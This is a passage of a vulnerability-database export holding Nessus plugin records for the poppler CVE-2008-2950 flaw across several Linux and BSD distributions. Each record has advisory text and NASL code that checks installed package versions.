value:\"p-cpe:/a:mandriva:linux:libpoppler-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-glib2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler-qt4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpoppler2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-glib-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-glib2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64poppler2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-glib-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-glib2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt4-2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler-qt4-devel-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpoppler2-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"poppler-0.6-3.2mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-glib-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-glib2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler-qt4-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64poppler2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-glib-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-glib2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt4-2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler-qt4-devel-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpoppler2-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"poppler-0.6.4-2.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:11", "bulletinFamily": "scanner", "description": "Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 - use of an uninitialized pointer to call free() in Page::~Page (#454277) http://www.ocert.org/advisories/ocert-2008-007.html Bug fixes: Fix crash when reading QuadPoints (#448516) Use static FT_Library in CairoOutputDev, as dynamic may trigger use-after-free and crash e.g. evince (#456867)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-24T00:00:00", "id": "FEDORA_2008-7012.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34172", "published": "2008-09-12T00:00:00", "title": "Fedora 9 : poppler-0.8.1-2.fc9 (2008-7012)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-7012.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34172);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/12/24 10:14:26\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"FEDORA\", value:\"2008-7012\");\n\n script_name(english:\"Fedora 9 : poppler-0.8.1-2.fc9 (2008-7012)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 -\nuse of an uninitialized pointer to call free() in Page::~Page\n(#454277) http://www.ocert.org/advisories/ocert-2008-007.html Bug\nfixes: Fix crash when reading QuadPoints (#448516) Use static\nFT_Library in CairoOutputDev, as dynamic may trigger use-after-free\nand crash e.g. evince (#456867)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.ocert.org/advisories/ocert-2008-007.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ocert.org/advisories/ocert-2008-007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=454277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-September/014228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfe84d59\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected poppler package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"poppler-0.8.1-2.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:06", "bulletinFamily": "scanner", "description": "Felipe Andres Manzano discovered that poppler did not correctly initialize certain page widgets. If a user were tricked into viewing a malicious PDF file, a remote attacker could exploit this to crash applications linked against poppler, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-02T00:00:00", "id": "UBUNTU_USN-631-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33760", "published": "2008-07-29T00:00:00", "title": "Ubuntu 7.10 / 8.04 LTS : poppler vulnerability (USN-631-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-631-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33760);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_bugtraq_id(30107);\n script_xref(name:\"USN\", value:\"631-1\");\n\n script_name(english:\"Ubuntu 7.10 / 8.04 LTS : poppler vulnerability (USN-631-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Felipe Andres Manzano discovered that poppler did not correctly\ninitialize certain page widgets. If a user were tricked into viewing a\nmalicious PDF file, a remote attacker could exploit this to crash\napplications linked against poppler, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/631-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-glib-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-glib2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler-qt4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpoppler2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:poppler-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-glib-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-glib2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt4-2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler-qt4-dev\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libpoppler2\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"poppler-utils\", pkgver:\"0.6-0ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-glib-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-glib2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt4-2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler-qt4-dev\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpoppler2\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"poppler-utils\", pkgver:\"0.6.4-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpoppler-dev / libpoppler-glib-dev / libpoppler-glib2 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:03", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200807-04 (Poppler: User-assisted execution of arbitrary code)\n\n Felipe Andres Manzano reported a memory management issue in the Page class constructor/destructor.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted PDF file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or Evince, potentially resulting in the execution of arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-08-10T00:00:00", "id": "GENTOO_GLSA-200807-04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33461", "published": "2008-07-10T00:00:00", "title": "GLSA-200807-04 : Poppler: User-assisted execution of arbitrary code", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200807-04.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33461);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"GLSA\", value:\"200807-04\");\n\n script_name(english:\"GLSA-200807-04 : Poppler: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200807-04\n(Poppler: User-assisted execution of arbitrary code)\n\n Felipe Andres Manzano reported a memory management issue in the Page\n class constructor/destructor.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview,\n or Evince, potentially resulting in the execution of arbitrary code\n with the privileges of the user running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200807-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All poppler users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/poppler-0.6.3-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/poppler\", unaffected:make_list(\"ge 0.6.3-r1\"), vulnerable:make_list(\"lt 0.6.3-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:03", "bulletinFamily": "scanner", "description": "Felipe Andres Manzano reports :\n\nThe libpoppler pdf rendering library, can free uninitialized pointers, leading to arbitrary code execution. This vulnerability results from memory management bugs in the Page class constructor/destructor.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_BC20510F4DD411DD93E70211D880E350.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33471", "published": "2008-07-10T00:00:00", "title": "FreeBSD : poppler -- uninitialized pointer (bc20510f-4dd4-11dd-93e7-0211d880e350)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33471);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:41\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"EDB-ID\", value:\"6032\");\n\n script_name(english:\"FreeBSD : poppler -- uninitialized pointer (bc20510f-4dd4-11dd-93e7-0211d880e350)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Felipe Andres Manzano reports :\n\nThe libpoppler pdf rendering library, can free uninitialized pointers,\nleading to arbitrary code execution. This vulnerability results from\nmemory management bugs in the Page class constructor/destructor.\"\n );\n # https://vuxml.freebsd.org/freebsd/bc20510f-4dd4-11dd-93e7-0211d880e350.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?444f7058\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n 